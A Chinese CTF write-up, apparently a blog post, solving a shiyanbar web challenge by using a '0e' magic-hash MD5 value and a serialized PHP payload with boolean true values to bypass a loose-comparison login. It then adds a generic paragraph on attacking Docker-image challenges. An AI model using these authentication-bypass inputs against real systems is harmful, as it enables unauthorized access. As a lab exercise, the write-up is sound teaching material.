ctf的web题目php,CTF最简单的Web题

http://www.shiyanbar.com/ctf/1810

天网管理系统

天网你敢来挑战嘛

格式:ctf{ }

解题链接: http://ctf5.shiyanbar.com/10/web1

查看源代码发现提示

md5($test) = ‘0’

百度0开头的md5值,随便拿一个带进username用就OK了。

得到一个提示:

/user.php?fame=hjkleffifer

进入  http://ctf5.shiyanbar.com/10/web1/user.php?fame=hjkleffifer

$unserialize_str = $_POST[‘password‘];

$data_unserialize = unserialize($unserialize_str);

if($data_unserialize[‘user‘] == ‘???‘ && $data_unserialize[‘pass‘]==‘???‘)

{ print_r($flag); }

伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年

把复杂的数据类型压缩到一个字符串中

serialize() 把变量和它们的值编码成文本形式

unserialize() 恢复原先变量

弱类型,bool的true和任意字符串弱类型相等,

所以构造的user(bool)和password(bool)的值为true即可。

$payload = array(‘user‘=>true,‘pass‘ => true);

echo serialize($payload);

?>

得到

a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

user:admin

password: a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

得到

ctf{dwduwkhduw5465}

ctfweb题目"docker镜像"是指一个挑战题目,要求我们对一个Docker镜像进行析和攻击。Docker是一种容器化技术,可以将应用、环境和关联的配置打包成一个独立的镜像。这个镜像可以在不同的环境中进行移植和运行。 对于这个ctfweb题目,我们可以首先通过命令"docker images"查看当前系统中的Docker镜像。然后,我们可以选择这个题目中的特定镜像进行析,使用"docker inspect [镜像ID]"命令获取有关镜像的详细信息。 接下来,我们可以尝试在本地使用这个镜像来运行一个容器。可以使用"docker run [镜像ID]"命令创建一个新的容器实例,并根据题目给出的提示找出容器内的漏洞、文件、服务等信息。 从容器内部提取敏感信息的常见方法包括查找配置文件、访问数据库、析日志文件等。另外,在容器中也可以进行一些命令执行、代码注入等漏洞利用操作,以获取更高的权限和更深入的信息。 此外,我们还可以使用一些常见的Docker安全工具,比如Docker Bench for Security、Clair、Trivy等来对容器进行漏洞扫描,识别潜在的安全问,并找出可能存在的弱点。 当我们找到容器内的漏洞或弱点时,我们可以根据具体情况进行利用或编写脚本进行自动化攻击。在攻击过程中,我们应该遵循道德规范,不进行未授权的攻击行为。 总之,ctfweb题目"docker镜像"需要我们对Docker容器进行析和攻击,通过理解镜像的构成和原理,掌握Docker相关的命令以及使用一些安全工具,我们可以更好地解决这个题目并获得相应的数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值